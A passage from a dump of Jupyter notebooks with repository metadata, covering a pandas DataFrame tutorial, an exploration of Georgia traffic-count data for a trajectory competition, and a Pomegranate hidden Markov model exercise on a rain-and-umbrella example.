[ [ [ "___\n\n<a href='http://www.pieriandata.com'><img src='../Pierian_Data_Logo.png'/></a>\n___\n<center><em>Copyright Pierian Data</em></center>\n<center><em>For more information, visit us at <a href='http://www.pieriandata.com'>www.pieriandata.com</a></em></center>", "_____no_output_____" ], [ "# DataFrames\n\nDataFrames are the workhorse of pandas and are directly inspired by the R programming language. We can think of a DataFrame as a bunch of Series objects put together to share the same index. Let's use pandas to explore this topic!", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nfrom numpy.random import randint", "_____no_output_____" ], [ "columns= ['W', 'X', 'Y', 'Z'] # four columns\nindex= ['A', 'B', 'C', 'D', 'E'] # five rows", "_____no_output_____" ], [ "np.random.seed(42)\ndata = randint(-100,100,(5,4))", "_____no_output_____" ], [ "data", "_____no_output_____" ], [ "df = pd.DataFrame(data,index,columns)", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "# Selection and Indexing\n\nLet's learn the various methods to grab data from a DataFrame\n\n# COLUMNS\n\n## Grab a single column", "_____no_output_____" ] ], [ [ "df['W']", "_____no_output_____" ] ], [ [ "## Grab multiple columns", "_____no_output_____" ] ], [ [ "# Pass a list of column names\ndf[['W','Z']]", "_____no_output_____" ] ], [ [ "### DataFrame Columns are just Series ", "_____no_output_____" ] ], [ [ "type(df['W'])", "_____no_output_____" ] ], [ [ "### Creating a new column:", "_____no_output_____" ] ], [ [ "df['new'] = df['W'] + df['Y']", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "## Removing Columns", "_____no_output_____" ] ], [ [ "# axis=1 because its a column\ndf.drop('new',axis=1)", "_____no_output_____" ], [ "# Not inplace unless reassigned!\ndf", "_____no_output_____" ], [ "df = df.drop('new',axis=1)", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "## Working with Rows", "_____no_output_____" ], [ "## Selecting one row by name", "_____no_output_____" ] ], [ [ "df.loc['A']", "_____no_output_____" ] ], [ [ "## Selecting multiple rows by name", "_____no_output_____" ] ], [ [ "df.loc[['A','C']]", "_____no_output_____" ] ], [ [ "## Select single row by integer index location", "_____no_output_____" ] ], [ [ "df.iloc[0]", "_____no_output_____" ] ], [ [ "## Select multiple rows by integer index location", "_____no_output_____" ] ], [ [ "df.iloc[0:2]", "_____no_output_____" ] ], [ [ "## Remove row by name", "_____no_output_____" ] ], [ [ "df.drop('C',axis=0)", "_____no_output_____" ], [ "# NOT IN PLACE!\ndf ", "_____no_output_____" ] ], [ [ "### Selecting subset of rows and columns at same time", "_____no_output_____" ] ], [ [ "df.loc[['A','C'],['W','Y']]", "_____no_output_____" ] ], [ [ "# Conditional Selection\n\nAn important feature of pandas is conditional selection using bracket notation, very similar to numpy:", "_____no_output_____" ] ], [ [ "df", "_____no_output_____" ], [ "df>0", "_____no_output_____" ], [ "df[df>0]", "_____no_output_____" ], [ "df['X']>0", "_____no_output_____" ], [ "df[df['X']>0]", "_____no_output_____" ], [ "df[df['X']>0]['Y']", "_____no_output_____" ], [ "df[df['X']>0][['Y','Z']]", "_____no_output_____" ] ], [ [ "For two conditions you can use | and & with parenthesis:", "_____no_output_____" ] ], [ [ "df[(df['W']>0) & (df['Y'] > 1)]", "_____no_output_____" ] ], [ [ "## More Index Details\n\nLet's discuss some more features of indexing, including resetting the index or setting it something else. We'll also talk about index hierarchy!", "_____no_output_____" ] ], [ [ "df", "_____no_output_____" ], [ "# Reset to default 0,1...n index\ndf.reset_index()", "_____no_output_____" ], [ "df", "_____no_output_____" ], [ "newind = 'CA NY WY OR CO'.split()", "_____no_output_____" ], [ "newind", "_____no_output_____" ], [ "df['States'] = newind", "_____no_output_____" ], [ "df", "_____no_output_____" ], [ "df.set_index('States')", "_____no_output_____" ], [ "df", "_____no_output_____" ], [ "df = df.set_index('States')", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "## DataFrame Summaries\nThere are a couple of ways to obtain summary data on DataFrames.<br>\n<tt><strong>df.describe()</strong></tt> provides summary statistics on all numerical columns.<br>\n<tt><strong>df.info and df.dtypes</strong></tt> displays the data type of all columns.", "_____no_output_____" ] ], [ [ "df.describe()", "_____no_output_____" ], [ "df.dtypes", "_____no_output_____" ], [ "df.info()", "<class 'pandas.core.frame.DataFrame'>\nIndex: 5 entries, CA to CO\nData columns (total 4 columns):\nW 5 non-null int32\nX 5 non-null int32\nY 5 non-null int32\nZ 5 non-null int32\ndtypes: int32(4)\nmemory usage: 120.0+ bytes\n" ] ], [ [ "# Great Job!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ] ]
cb1de0a73303e2de68ac968606756d7ef7552dcc
152,662
ipynb
Jupyter Notebook
notebooks/07_exploring_external_data.ipynb
vtoliveira/ey-nextwave-competition
bedd29f124cf07e1f953a37791b1f2475532399b
[ "MIT" ]
8
2019-07-03T13:40:00.000Z
2020-12-28T07:38:02.000Z
notebooks/07_exploring_external_data.ipynb
vtoliveira/ey-nextwave-competition
bedd29f124cf07e1f953a37791b1f2475532399b
[ "MIT" ]
5
2020-03-24T17:36:12.000Z
2021-12-13T20:11:48.000Z
notebooks/07_exploring_external_data.ipynb
vtoliveira/ey-nextwave-competition
bedd29f124cf07e1f953a37791b1f2475532399b
[ "MIT" ]
5
2019-07-03T13:40:01.000Z
2020-10-28T23:44:16.000Z
115.303625
80,952
0.795732
[ [ [ "# general tools\nimport warnings\nimport requests\nimport pickle\nimport math\nimport re\n\n# visualization tools\nimport matplotlib.pyplot as plt\nfrom tqdm.auto import tqdm\nimport seaborn as sns\n\n# data preprocessing tools\nimport pandas as pd\nfrom shapely.geometry import Point\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\n\ntqdm.pandas()\nplt.style.use('seaborn')\nwarnings.filterwarnings(\"ignore\")\n\n%run ../src/utils.py", "_____no_output_____" ], [ "traffic = pd.read_csv('../data/external/Traffic_Published_2016.csv')\ntraffic.shape", "_____no_output_____" ], [ "traffic.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 94258 entries, 0 to 94257\nData columns (total 16 columns):\nROUTE_ID 94258 non-null object\nFROM_MILEPOINT 94258 non-null float64\nTO_MILEPOINT 94258 non-null float64\nCOUNTY_COD 91713 non-null float64\nCOUNTY_NAME 91713 non-null object\nTC_NUMBER 41239 non-null object\nAADT 94258 non-null int64\nAADT_SINGLE_UNIT 44070 non-null float64\nPCT_PEAK_SINGLE 42724 non-null float64\nAADT_COMBINATION 43403 non-null float64\nPCT_PEAK_COMBINATION 37597 non-null float64\nK_FACTOR 83781 non-null float64\nD_Factor 41095 non-null float64\nFUTURE_AADT 94239 non-null float64\nLat 40984 non-null float64\nLong 40984 non-null float64\ndtypes: float64(12), int64(1), object(3)\nmemory usage: 11.5+ MB\n" ], [ "traffic = traffic.dropna(subset=['Lat'])\ntraffic.shape", "_____no_output_____" ], [ "train = pd.read_csv('../data/raw/data_train.zip', index_col='Unnamed: 0', low_memory=True)\ntest = pd.read_csv('../data/raw/data_test.zip', index_col='Unnamed: 0', low_memory=True)\n\ntrain.shape, test.shape", "_____no_output_____" ], [ "data = pd.concat([train, test], axis=0)\n\ndata.shape", "_____no_output_____" ], [ "import pyproj\n\nconverter = pyproj.Proj(\"+proj=merc +lat_ts=0 +lat_0=0 +lon_0=0 +x_0=0 \\\n +y_0=0 +ellps=WGS84 +datum=WGS84 +units=m +no_defs\")\n\ndata['lat_lon_entry'] = [converter(x, y, inverse=True) for x, y in zip(data.x_entry, data.y_entry)]\n\ndata['lat_entry'] = data.lat_lon_entry.apply(lambda row: row[0])\ndata['lon_entry'] = data.lat_lon_entry.apply(lambda row: row[1])\n\ndata['lat_lon_exit'] = [converter(x, y, inverse=True) for x, y in zip(data.x_exit, data.y_exit)]\n\ndata['lat_exit'] = data.lat_lon_exit.apply(lambda row: row[0])\ndata['lon_exit'] = data.lat_lon_exit.apply(lambda row: row[1])", "_____no_output_____" ], [ "data['euclidean_distance'] = euclidean(data.x_entry.values, data.y_entry.values,\n data.x_exit.values, data.y_exit.values)", "_____no_output_____" ], [ "from math import hypot\nfrom scipy.spatial.distance import cdist\nfrom tqdm import tqdm\n\ntraffic = traffic.reset_index(drop=True)\ncoords_traff = list(zip(traffic.Lat.values, traffic.Long.values))\ndata['idx_traffic'] = np.zeros(data.shape[0])\n\ndf_copy = data.copy()\ndf_copy = df_copy[df_copy.euclidean_distance!=0]\ndf_copy = df_copy.reset_index(drop=True)\n\ndef minimum_distance(data, row_type='entry'):\n for idx, (lat, long) in tqdm(enumerate(list(zip(data['lat_'+row_type].values, data['lon_'+row_type].values)))):\n minimum_dist = 0\n\n idx_traffic = cdist([(lat, long)], coords_traff).argmin()\n data.loc[idx, 'idx_traffic'] = idx_traffic\n \n return data\n\ndf_copy = minimum_distance(df_copy, row_type='exit')", "491966it [1:40:30, 81.58it/s]\n" ], [ "df_copy['idx_traffic'] = df_copy.idx_traffic.astype(int)", "_____no_output_____" ], [ "df_copy.head(4)", "_____no_output_____" ], [ "traffic_cols = traffic.columns.tolist()\n\ntraffic = traffic.reset_index(drop=False)\n#traffic.columns = ['idx_traffic']+[traffic_cols]\n\ndf_copy['index'] = df_copy.idx_traffic.values\n\ndf_final = df_copy.merge(traffic, on='index')\ndf_final.head(4)", "_____no_output_____" ], [ "final_columns = list(set(traffic.columns.tolist()) - set(['level_0', 'index']))\nfinal_columns += ['hash', 'trajectory_id']\n\nfor col in final_columns:\n if col not in ['hash', 'trajectory_id']:\n df_final = df_final.rename(index=str, columns={col: col+'_exit'})\n\ndf_final.head(4)", "_____no_output_____" ], [ "final_columns = ['hash', 'trajectory_id'] + [col+'_exit' for col in final_columns if col not in ['hash', 'trajectory_id']]", "_____no_output_____" ], [ "df_final[final_columns].head(4)\n\ndf_final = df_final.drop('COUNTY_NAME_exit', axis=1)", "_____no_output_____" ], [ "final_columns = list(set(final_columns) - set(['COUNTY_NAME_exit']))", "_____no_output_____" ], [ "df_final[final_columns].to_hdf('../data/external/traffic_exit_features.hdf', key='exit', mode='w')", "_____no_output_____" ] ], [ [ "From this point, we will perform a round of exploration and visualization regarding the newfound external data.", "_____no_output_____" ] ], [ [ "traffic_exit = pd.read_hdf('../data/raw/traffic_exit_features.hdf', key='exit', mode='r')\ntraffic_entry = pd.read_hdf('../data/raw/traffic_entry_features.hdf', key='entry', mode='r')\n\ntraffic_entry.shape, traffic_exit.shape", "_____no_output_____" ], [ "traffic_entry.head(4).T", "_____no_output_____" ] ], [ [ "- AADT: Annual Average Daily Traffic (AADT), is the total volume of vehicle traffic. of a roadway for a year divided by 365 days.\n- K_FACTOR: is defined as the proportion of annual average daily traffic occurring in an hour. This factor is used for designing and analyzing the flow of traffic on highways.\n- ROUTE_ID: Integer value representing each road on Georgia Federative's roads.", "_____no_output_____" ] ], [ [ "29.8% red, 74.1% green and 74.9% blue", "_____no_output_____" ], [ "fig, ax = plt.subplots(2, 1, figsize=(18, 15))\n\nsns.set_style(\"whitegrid\")\nsns.distplot(traffic_entry.AADT_entry.dropna().values, \n kde=False, \n hist_kws={\"linewidth\": 3, \n \"alpha\": 1, \n \"color\": \"coral\"},\n ax=ax[0])\n\nsns.distplot(traffic_entry.K_FACTOR_entry.dropna().values, \n kde=False, \n hist_kws={\"linewidth\": 3, \n \"alpha\": 1, \n \"color\": [(0.298, 0.741, 0.749)]},\n ax=ax[1])\n\nax[0].set_title('Annual Average Daily Traffic Distribution', fontsize=30)\nax[1].set_title('K-Factor: Proportion of annual average daily traffic occurring in an hour',\n fontsize=30)\n\nax[0].set_xlim(0, 150000)\nax[1].set_xlim(0, 25)\n\nax[0].grid(False)\nax[1].grid(False)\n\nax[0].tick_params(axis='both', which='major', labelsize=20)\nax[1].tick_params(axis='both', which='major', labelsize=20)", "_____no_output_____" ], [ "traffic_entry.AADT_entry.hist(bins=100)", "_____no_output_____" ], [ "traffic_entry.K_FACTOR_entry.hist(bins=100)", "_____no_output_____" ], [ "sns.countplot(x='ROUTE_ID_entry', data=traffic_entry)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1de28768813eea1375ca37d524f45f40230121
2,836
ipynb
Jupyter Notebook
example/MyM4.ipynb
nufeng1999/jupyter-MyM4-kernel
c5e7c505a08c954c835e88cb334296d42e63b7f7
[ "MIT" ]
null
null
null
example/MyM4.ipynb
nufeng1999/jupyter-MyM4-kernel
c5e7c505a08c954c835e88cb334296d42e63b7f7
[ "MIT" ]
null
null
null
example/MyM4.ipynb
nufeng1999/jupyter-MyM4-kernel
c5e7c505a08c954c835e88cb334296d42e63b7f7
[ "MIT" ]
null
null
null
20.70073
329
0.482722
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
cb1de601a2f92acba37b97730d147784cb26ed37
36,200
ipynb
Jupyter Notebook
HMM warmup (optional).ipynb
umeshpai/parts_of_speech_tagging
19c0ef53aae9a285554b245b5ecbe2c4604b729e
[ "MIT" ]
null
null
null
HMM warmup (optional).ipynb
umeshpai/parts_of_speech_tagging
19c0ef53aae9a285554b245b5ecbe2c4604b729e
[ "MIT" ]
null
null
null
HMM warmup (optional).ipynb
umeshpai/parts_of_speech_tagging
19c0ef53aae9a285554b245b5ecbe2c4604b729e
[ "MIT" ]
null
null
null
73.427992
13,044
0.74721
[ [ [ "# Intro to Hidden Markov Models (optional)\n---\n### Introduction\n\nIn this notebook, you'll use the [Pomegranate](http://pomegranate.readthedocs.io/en/latest/index.html) library to build a simple Hidden Markov Model and explore the Pomegranate API.\n\n<div class=\"alert alert-block alert-info\">\n**Note:** You are not required to complete this notebook and it will not be submitted with your project, but it is designed to quickly introduce the relevant parts of the Pomegranate library that you will need to complete the part of speech tagger.\n</div>\n\nThe notebook already contains some code to get you started. You only need to add some new functionality in the areas indicated; you will not need to modify the included code beyond what is requested. Sections that begin with **'IMPLEMENTATION'** in the header indicate that you need to fill in code in the block that follows. Instructions will be provided for each section, and the specifics of the implementation are marked in the code block with a 'TODO' statement. Please be sure to read the instructions carefully!\n\n<div class=\"alert alert-block alert-info\">\n**Note:** Code and Markdown cells can be executed using the `Shift + Enter` keyboard shortcut. Markdown cells can be edited by double-clicking the cell to enter edit mode.\n</div>\n<hr>", "_____no_output_____" ], [ "<div class=\"alert alert-block alert-warning\">\n**Note:** Make sure you have selected a **Python 3** kernel in Workspaces or the hmm-tagger conda environment if you are running the Jupyter server on your own machine.\n</div>", "_____no_output_____" ] ], [ [ "# Jupyter \"magic methods\" -- only need to be run once per kernel restart\n%load_ext autoreload\n%aimport helpers\n%autoreload 1", "_____no_output_____" ], [ "# import python modules -- this cell needs to be run again if you make changes to any of the files\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom helpers import show_model\nfrom pomegranate import State, HiddenMarkovModel, DiscreteDistribution", "_____no_output_____" ] ], [ [ "## Build a Simple HMM\n---\nYou will start by building a simple HMM network based on an example from the textbook [Artificial Intelligence: A Modern Approach](http://aima.cs.berkeley.edu/).\n\n> You are the security guard stationed at a secret under-ground installation. Each day, you try to guess whether it’s raining today, but your only access to the outside world occurs each morning when you see the director coming in with, or without, an umbrella.\n\nA simplified diagram of the required network topology is shown below.\n\n![](_example.png)\n\n### Describing the Network\n\n<div class=\"alert alert-block alert-warning\">\n$\\lambda = (A, B)$ specifies a Hidden Markov Model in terms of an emission probability distribution $A$ and a state transition probability distribution $B$.\n</div>\n\nHMM networks are parameterized by two distributions: the emission probabilties giving the conditional probability of observing evidence values for each hidden state, and the transition probabilities giving the conditional probability of moving between states during the sequence. Additionally, you can specify an initial distribution describing the probability of a sequence starting in each state.\n\n<div class=\"alert alert-block alert-warning\">\nAt each time $t$, $X_t$ represents the hidden state, and $Y_t$ represents an observation at that time.\n</div>\n\nIn this problem, $t$ corresponds to each day of the week and the hidden state represent the weather outside (whether it is Rainy or Sunny) and observations record whether the security guard sees the director carrying an umbrella or not.\n\nFor example, during some particular week the guard may observe an umbrella ['yes', 'no', 'yes', 'no', 'yes'] on Monday-Friday, while the weather outside is ['Rainy', 'Sunny', 'Sunny', 'Sunny', 'Rainy']. In that case, $t=Wednesday$, $Y_{Wednesday}=yes$, and $X_{Wednesday}=Sunny$. (It might be surprising that the guard would observe an umbrella on a sunny day, but it is possible under this type of model.)\n\n### Initializing an HMM Network with Pomegranate\nThe Pomegranate library supports [two initialization methods](http://pomegranate.readthedocs.io/en/latest/HiddenMarkovModel.html#initialization). You can either explicitly provide the three distributions, or you can build the network line-by-line. We'll use the line-by-line method for the example network, but you're free to use either method for the part of speech tagger.", "_____no_output_____" ] ], [ [ "# create the HMM model\nmodel = HiddenMarkovModel(name=\"Example Model\")", "_____no_output_____" ] ], [ [ "### **IMPLEMENTATION**: Add the Hidden States\nWhen the HMM model is specified line-by-line, the object starts as an empty container. The first step is to name each state and attach an emission distribution.\n\n#### Observation Emission Probabilities: $P(Y_t | X_t)$\nWe need to assume that we have some prior knowledge (possibly from a data set) about the director's behavior to estimate the emission probabilities for each hidden state. In real problems you can often estimate the emission probabilities empirically, which is what we'll do for the part of speech tagger. Our imaginary data will produce the conditional probability table below. (Note that the rows sum to 1.0)\n\n| | $yes$ | $no$ |\n| --- | --- | --- |\n| $Sunny$ | 0.10 | 0.90 |\n| $Rainy$ | 0.80 | 0.20 |", "_____no_output_____" ] ], [ [ "# create the HMM model\nmodel = HiddenMarkovModel(name=\"Example Model\")\n\n# emission probability distributions, P(umbrella | weather)\nsunny_emissions = DiscreteDistribution({\"yes\": 0.1, \"no\": 0.9})\nsunny_state = State(sunny_emissions, name=\"Sunny\")\n\n# TODO: create a discrete distribution for the rainy emissions from the probability table\n# above & use that distribution to create a state named Rainy\nrainy_emissions = DiscreteDistribution({\"yes\": 0.8, \"no\": 0.2})\nrainy_state = State(rainy_emissions, name=\"Rainy\")\n\n# add the states to the model\nmodel.add_states(sunny_state, rainy_state)\n\nassert rainy_emissions.probability(\"yes\") == 0.8, \"The director brings his umbrella with probability 0.8 on rainy days\"\nprint(\"Looks good so far!\")", "Looks good so far!\n" ] ], [ [ "### **IMPLEMENTATION:** Adding Transitions\nOnce the states are added to the model, we can build up the desired topology of individual state transitions.\n\n#### Initial Probability $P(X_0)$:\nWe will assume that we don't know anything useful about the likelihood of a sequence starting in either state. If the sequences start each week on Monday and end each week on Friday (so each week is a new sequence), then this assumption means that it's equally likely that the weather on a Monday may be Rainy or Sunny. We can assign equal probability to each starting state by setting $P(X_0=Rainy) = 0.5$ and $P(X_0=Sunny)=0.5$:\n\n| $Sunny$ | $Rainy$ |\n| --- | ---\n| 0.5 | 0.5 |\n\n#### State transition probabilities $P(X_{t} | X_{t-1})$\nFinally, we will assume for this example that we can estimate transition probabilities from something like historical weather data for the area. In real problems you can often use the structure of the problem (like a language grammar) to impose restrictions on the transition probabilities, then re-estimate the parameters with the same training data used to estimate the emission probabilities. Under this assumption, we get the conditional probability table below. (Note that the rows sum to 1.0)\n\n| | $Sunny$ | $Rainy$ |\n| --- | --- | --- |\n|$Sunny$| 0.80 | 0.20 |\n|$Rainy$| 0.40 | 0.60 |", "_____no_output_____" ] ], [ [ "# create edges for each possible state transition in the model\n# equal probability of a sequence starting on either a rainy or sunny day\nmodel.add_transition(model.start, sunny_state, 0.5)\nmodel.add_transition(model.start, rainy_state, 0.5)\n\n# add sunny day transitions (we already know estimates of these probabilities\n# from the problem statement)\nmodel.add_transition(sunny_state, sunny_state, 0.8) # 80% sunny->sunny\nmodel.add_transition(sunny_state, rainy_state, 0.2) # 20% sunny->rainy\n\n# TODO: add rainy day transitions using the probabilities specified in the transition table\nmodel.add_transition(rainy_state, sunny_state, 0.4) # 40% rainy->sunny\nmodel.add_transition(rainy_state, rainy_state, 0.6) # 60% rainy->rainy\n\n# finally, call the .bake() method to finalize the model\nmodel.bake()\n\nassert model.edge_count() == 6, \"There should be two edges from model.start, two from Rainy, and two from Sunny\"\nassert model.node_count() == 4, \"The states should include model.start, model.end, Rainy, and Sunny\"\nprint(\"Great! You've finished the model.\")", "Great! You've finished the model.\n" ] ], [ [ "## Visualize the Network\n---\nWe have provided a helper function called `show_model()` that generates a PNG image from a Pomegranate HMM network. You can specify an optional filename to save the file to disk. Setting the \"show_ends\" argument True will add the model start & end states that are included in every Pomegranate network.", "_____no_output_____" ] ], [ [ "show_model(model, figsize=(5, 5), filename=\"example.png\", overwrite=True, show_ends=False)", "_____no_output_____" ] ], [ [ "### Checking the Model\nThe states of the model can be accessed using array syntax on the `HMM.states` attribute, and the transition matrix can be accessed by calling `HMM.dense_transition_matrix()`. Element $(i, j)$ encodes the probability of transitioning from state $i$ to state $j$. For example, with the default column order specified, element $(2, 1)$ gives the probability of transitioning from \"Rainy\" to \"Sunny\", which we specified as 0.4.\n\nRun the next cell to inspect the full state transition matrix, then read the . ", "_____no_output_____" ] ], [ [ "column_order = [\"Example Model-start\", \"Sunny\", \"Rainy\", \"Example Model-end\"] # Override the Pomegranate default order\ncolumn_names = [s.name for s in model.states]\norder_index = [column_names.index(c) for c in column_order]\n\n# re-order the rows/columns to match the specified column order\ntransitions = model.dense_transition_matrix()[:, order_index][order_index, :]\nprint(\"The state transition matrix, P(Xt|Xt-1):\\n\")\nprint(transitions)\nprint(\"\\nThe transition probability from Rainy to Sunny is {:.0f}%\".format(100 * transitions[2, 1]))", "The state transition matrix, P(Xt|Xt-1):\n\n[[ 0. 0.5 0.5 0. ]\n [ 0. 0.8 0.2 0. ]\n [ 0. 0.4 0.6 0. ]\n [ 0. 0. 0. 0. ]]\n\nThe transition probability from Rainy to Sunny is 40%\n" ] ], [ [ "## Inference in Hidden Markov Models\n---\nBefore moving on, we'll use this simple network to quickly go over the Pomegranate API to perform the three most common HMM tasks:\n\n<div class=\"alert alert-block alert-info\">\n**Likelihood Evaluation**<br>\nGiven a model $\\lambda=(A,B)$ and a set of observations $Y$, determine $P(Y|\\lambda)$, the likelihood of observing that sequence from the model\n</div>\n\nWe can use the weather prediction model to evaluate the likelihood of the sequence [yes, yes, yes, yes, yes] (or any other state sequence). The likelihood is often used in problems like machine translation to weight interpretations in conjunction with a statistical language model.\n\n<div class=\"alert alert-block alert-info\">\n**Hidden State Decoding**<br>\nGiven a model $\\lambda=(A,B)$ and a set of observations $Y$, determine $Q$, the most likely sequence of hidden states in the model to produce the observations\n</div>\n\nWe can use the weather prediction model to determine the most likely sequence of Rainy/Sunny states for a known observation sequence, like [yes, no] -> [Rainy, Sunny]. We will use decoding in the part of speech tagger to determine the tag for each word of a sentence. The decoding can be further split into \"smoothing\" when we want to calculate past states, \"filtering\" when we want to calculate the current state, or \"prediction\" if we want to calculate future states. \n\n<div class=\"alert alert-block alert-info\">\n**Parameter Learning**<br>\nGiven a model topography (set of states and connections) and a set of observations $Y$, learn the transition probabilities $A$ and emission probabilities $B$ of the model, $\\lambda=(A,B)$\n</div>\n\nWe don't need to learn the model parameters for the weather problem or POS tagging, but it is supported by Pomegranate.\n\n### IMPLEMENTATION: Calculate Sequence Likelihood\n\nCalculating the likelihood of an observation sequence from an HMM network is performed with the [forward algorithm](https://en.wikipedia.org/wiki/Forward_algorithm). Pomegranate provides the the `HMM.forward()` method to calculate the full matrix showing the likelihood of aligning each observation to each state in the HMM, and the `HMM.log_probability()` method to calculate the cumulative likelihood over all possible hidden state paths that the specified model generated the observation sequence.\n\nFill in the code in the next section with a sample observation sequence and then use the `forward()` and `log_probability()` methods to evaluate the sequence.", "_____no_output_____" ] ], [ [ "# TODO: input a sequence of 'yes'/'no' values in the list below for testing\nobservations = ['yes', 'no', 'yes']\n\nassert len(observations) > 0, \"You need to choose a sequence of 'yes'/'no' observations to test\"\n\n# TODO: use model.forward() to calculate the forward matrix of the observed sequence,\n# and then use np.exp() to convert from log-likelihood to likelihood\nforward_matrix = np.exp(model.forward(observations))\n\n# TODO: use model.log_probability() to calculate the all-paths likelihood of the\n# observed sequence and then use np.exp() to convert log-likelihood to likelihood\nprobability_percentage = np.exp(model.log_probability(observations))\n\n# Display the forward probabilities\nprint(\" \" + \"\".join(s.name.center(len(s.name)+6) for s in model.states))\nfor i in range(len(observations) + 1):\n print(\" <start> \" if i==0 else observations[i - 1].center(9), end=\"\")\n print(\"\".join(\"{:.0f}%\".format(100 * forward_matrix[i, j]).center(len(s.name) + 6)\n for j, s in enumerate(model.states)))\n\nprint(\"\\nThe likelihood over all possible paths \" + \\\n \"of this model producing the sequence {} is {:.2f}%\\n\\n\"\n .format(observations, 100 * probability_percentage))", " Rainy Sunny Example Model-start Example Model-end \n <start> 0% 0% 100% 0% \n yes 40% 5% 0% 0% \n no 5% 18% 0% 0% \n yes 5% 2% 0% 0% \n\nThe likelihood over all possible paths of this model producing the sequence ['yes', 'no', 'yes'] is 6.92%\n\n\n" ] ], [ [ "### IMPLEMENTATION: Decoding the Most Likely Hidden State Sequence\n\nThe [Viterbi algorithm](https://en.wikipedia.org/wiki/Viterbi_algorithm) calculates the single path with the highest likelihood to produce a specific observation sequence. Pomegranate provides the `HMM.viterbi()` method to calculate both the hidden state sequence and the corresponding likelihood of the viterbi path.\n\nThis is called \"decoding\" because we use the observation sequence to decode the corresponding hidden state sequence. In the part of speech tagging problem, the hidden states map to parts of speech and the observations map to sentences. Given a sentence, Viterbi decoding finds the most likely sequence of part of speech tags corresponding to the sentence.\n\nFill in the code in the next section with the same sample observation sequence you used above, and then use the `model.viterbi()` method to calculate the likelihood and most likely state sequence. Compare the Viterbi likelihood against the forward algorithm likelihood for the observation sequence.", "_____no_output_____" ] ], [ [ "# TODO: input a sequence of 'yes'/'no' values in the list below for testing\nobservations = ['yes', 'no', 'yes']\n\n# TODO: use model.viterbi to find the sequence likelihood & the most likely path\nviterbi_likelihood, viterbi_path = model.viterbi(observations)\n\nprint(\"The most likely weather sequence to have generated \" + \\\n \"these observations is {} at {:.2f}%.\"\n .format([s[1].name for s in viterbi_path[1:]], np.exp(viterbi_likelihood)*100)\n)", "The most likely weather sequence to have generated these observations is ['Rainy', 'Sunny', 'Rainy'] at 2.30%.\n" ] ], [ [ "### Forward likelihood vs Viterbi likelihood\nRun the cells below to see the likelihood of each sequence of observations with length 3, and compare with the viterbi path.", "_____no_output_____" ] ], [ [ "from itertools import product\n\nobservations = ['no', 'no', 'yes']\n\np = {'Sunny': {'Sunny': np.log(.8), 'Rainy': np.log(.2)}, 'Rainy': {'Sunny': np.log(.4), 'Rainy': np.log(.6)}}\ne = {'Sunny': {'yes': np.log(.1), 'no': np.log(.9)}, 'Rainy':{'yes':np.log(.8), 'no':np.log(.2)}}\no = observations\nk = []\nvprob = np.exp(model.viterbi(o)[0])\nprint(\"The likelihood of observing {} if the weather sequence is...\".format(o))\nfor s in product(*[['Sunny', 'Rainy']]*3):\n k.append(np.exp(np.log(.5)+e[s[0]][o[0]] + p[s[0]][s[1]] + e[s[1]][o[1]] + p[s[1]][s[2]] + e[s[2]][o[2]]))\n print(\"\\t{} is {:.2f}% {}\".format(s, 100 * k[-1], \" <-- Viterbi path\" if k[-1] == vprob else \"\"))\nprint(\"\\nThe total likelihood of observing {} over all possible paths is {:.2f}%\".format(o, 100*sum(k)))", "The likelihood of observing ['no', 'no', 'yes'] if the weather sequence is...\n\t('Sunny', 'Sunny', 'Sunny') is 2.59% \n\t('Sunny', 'Sunny', 'Rainy') is 5.18% <-- Viterbi path\n\t('Sunny', 'Rainy', 'Sunny') is 0.07% \n\t('Sunny', 'Rainy', 'Rainy') is 0.86% \n\t('Rainy', 'Sunny', 'Sunny') is 0.29% \n\t('Rainy', 'Sunny', 'Rainy') is 0.58% \n\t('Rainy', 'Rainy', 'Sunny') is 0.05% \n\t('Rainy', 'Rainy', 'Rainy') is 0.58% \n\nThe total likelihood of observing ['no', 'no', 'yes'] over all possible paths is 10.20%\n" ] ], [ [ "### Congratulations!\nYou've now finished the HMM warmup. You should have all the tools you need to complete the part of speech tagger project.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1de61ca4485bd07a5eb2e0f5c7210d7c04ee46
25,034
ipynb
Jupyter Notebook
notebooks/3-modelagem.ipynb
Srekin/Auto_Insurance
778a6d125f5d37f975c0fc0d5051bf8a98fe56a1
[ "MIT" ]
null
